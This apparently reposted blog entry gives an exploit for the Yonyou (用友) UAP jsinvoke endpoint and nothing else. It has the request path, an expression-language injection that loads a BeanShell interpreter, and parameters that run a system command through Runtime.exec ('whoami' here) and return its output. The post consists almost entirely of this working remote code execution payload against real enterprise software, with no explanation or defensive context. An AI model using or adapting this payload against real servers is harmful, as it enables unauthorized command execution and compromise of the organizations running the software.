用友/uapjs/jsinvoke/?action=invoke

${param.getClass().forName(param.bsh).newInstance().eval(param.cmd)}

bsh=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

posted @ 2023-07-16 23:14  匿名用户12  阅读(432)  评论(0编辑  收藏  举报